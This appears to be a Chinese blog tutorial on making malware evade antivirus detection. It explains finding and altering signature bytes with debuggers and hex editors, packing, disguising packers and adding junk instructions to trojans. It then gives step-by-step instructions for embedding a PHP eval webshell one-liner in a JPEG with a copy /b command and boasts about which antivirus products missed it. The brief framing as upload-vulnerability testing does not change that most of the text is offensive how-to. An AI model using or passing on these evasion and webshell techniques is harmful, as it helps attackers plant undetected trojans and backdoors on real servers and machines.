大家好，今天小编来为大家解答免杀教程这个问题 ，免杀教程网站很多人还不知道
，现在让我们一起来看看吧！

本文目录

1. 怎么做免杀。 。
2. 免杀图片马制作详细教程

一、怎么做免杀
。。

1.文件免杀和查杀:在不运行程序的前提下使用用杀毒软件进行对该程序的扫描，所得结果 。

2.内存的免杀和查杀:判断的方法1>运行后,用杀毒软件的内存查杀功能.

2>用OD载入,用杀毒软件的内存查杀功能.

1.含意:能识别一个程序是一个病毒的一段不大于64字节的特征串.

2.为了减少误报率,一般杀毒软件会提取多段特征串,这时,我们往往改一处就可达到

免杀效果,当然有些杀毒软件要同时改几处才能免杀.(这些方法以后详细介绍)

3.下面用一个示意图来具体来了解一下特征码的具体概念

1.特征码的查找方法:文件中的特征码被我们填入的数据（比如0）替换了 ，那杀毒软

件就不会报警，以此确定特征码的位置

2.特征码定位器的工作原理:原文件中部分字节替换为0
，然后生成新文件，再根据杀

毒软件来检测这些文件的结果判断特征码的位置

1.CCL(特征码定位器 ，由于杀软的升级
，现已过时)

2.MYCCL(特征码定位器，由程序员Tanknight在CCL的基础上改进)

3.OllyDbg(特征码的修改 ，可用于反汇编)

4.C32ASM（特征码的修改
，也可用于反汇编）

5.OC(用于计算从文件偏移地址到内存地址的小工具)

6.UltaEdit-32(十六进制编辑器,用于特征码的手工准确定位或修改)

特征码修改包括文件特征码修改和内存特征码修改，因为这二种特征码的修改方法

是通用的。所以就对目前流行的特征码修改方法作个总节
。

方法一:直接修改特征码的十六进制法

1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.

2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下文件能

1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.

2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.

1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.

2.适用范围:特征码中必需有可以替换的汇编指令.比如JE,JNE换成JMP等.

如果对汇编不懂的偏移可以去查看8080汇编手册.

1.修改方法:把具有特征码的代码顺序互换一下.

2.适用范围:具有一定的局限性,代码互换后必须不能影响程序的正常执行

1.修改方法:把特征码移到零区域(指代码的空隙处)执行后 ，使用jmp指令无条件调回原代码处继续执行下一条指令

2.适用范围:通用的改法,建议大家要掌握这种改法.

举例来说
，如果说程序是一张烙饼，那壳就是包装袋 ，可以让你发现不了包装袋里的东西是什么。比较常见的壳一般容易被杀毒软件识别
，所以加壳有时候会使用到生僻壳，就是不常用的壳 。现在去买口香糖你会发现至少有两层包装 ，所以壳也可以加多重壳，让杀毒软件看不懂
。如果你看到一个袋子上面写着干燥剂 、有毒之类的字你也许就不会对他感兴趣了吧
，这就是伪装壳，把一种壳伪装成其他壳 ，干扰杀毒软件正常的检测。

加壳改壳是病毒免杀常用的手段之一
，加壳改壳原理是将一个木马文件加上upx壳或者其它壳后用lordpe将文件入口点加1，然后将区段字符全部去掉 ，然后用od打开免杀的木马在入口上下100字符内修改一些代码让杀毒软件查不出来是什么壳就不知道怎么脱就可以实现免杀的目的
，但这种技术只有熟悉汇编语言的人才会，这种免杀方法高效可以一口气过众多杀软也是免杀爱好者应该学会的一种技术 。

加花是病毒免杀常用的手段 ，加花的原理就是通过添加加花指令（一些垃圾指令
，类型加1减1之类的无用语句）让杀毒软件检测不到特征码，干扰杀毒软件正常的检测
。加花以后 ，一些杀毒软件就检测不出来了
，但是有些比较强的杀毒软件，病毒还是会被杀的。这可以算是“免杀 ”技术中最初级的阶段 。

5.改木马文件特征码的5种常用方法（参见“修改内存特征码
”）

小结：免杀在某种程度上可以说是杀毒软件的对立面 ，这种技术随着杀毒软件的升级而升级，

从最初的表面查杀到现在的木马行为防御（瑞星）
，文件实时防毒（金山）等等，

免杀技术都将这些绕过 ，我们可以看到
，杀软每增加一个新功能，免杀新技术就应运而生

用一句古语说 ，免杀技术是与杀毒软件相生相克的
。

学习免杀
，你将领略到汇编与反汇编的快乐天堂！

二
、免杀图片马制作详细教程

本文将教授各位如何制作一枚免杀图片马，以应对文件上传漏洞中的测试需求。制作过程分为三个关键步骤 。

首先 ，准备图片和一句话木马文件
。确保图片文件名为“demo.jpg”
，木马文件名为“yjh.php ”。这里特别强调，开发语言遵循严格规范 ，一句话木马的代码格式为“?>@eval:$_POST['caidao']”
，注意每项元素如“eval
”，“$_POST” ，以及参数“caidao ”的小写及引号的使用 。

接着，进行图片与木马合成。使用快捷键“win+R
”打开cmd
，切换至文件存放路径并执行命令：“copy demo.jpg/b+ yjh.php tpm.jpg”
。确保遵循顺序和格式规范，即先输入图片文件名 ，后输入代码文件名
，且图片文件名后紧接“/b ”。完成操作后，合成图片将出现在原路径下 。

最后 ，进行验证
。先检查合成图片是否正常显示
，再使用十六进制编辑软件（如winhex）或简单的文本编辑器（如notepad++）打开文件，确认木马已被内嵌。至此 ，完美的图片马已制作完成 。

特别提醒
，使用制作的图片马进行测试时，发现国内主流杀毒软件如360、瑞星 、金山毒霸等未能识别出木马病毒 ，而趋势科技和美国的Fortinet（国内译：飞塔）杀软则能有效识别
。此外
，测试过程中，安全研究者常用的火绒软件未能检测出病毒 ，证明了图片马的隐蔽性和免杀特性。

文章到此结束，如果本次分享的免杀教程和免杀教程网站的问题解决了您的问题
，那么我们由衷的感到高兴！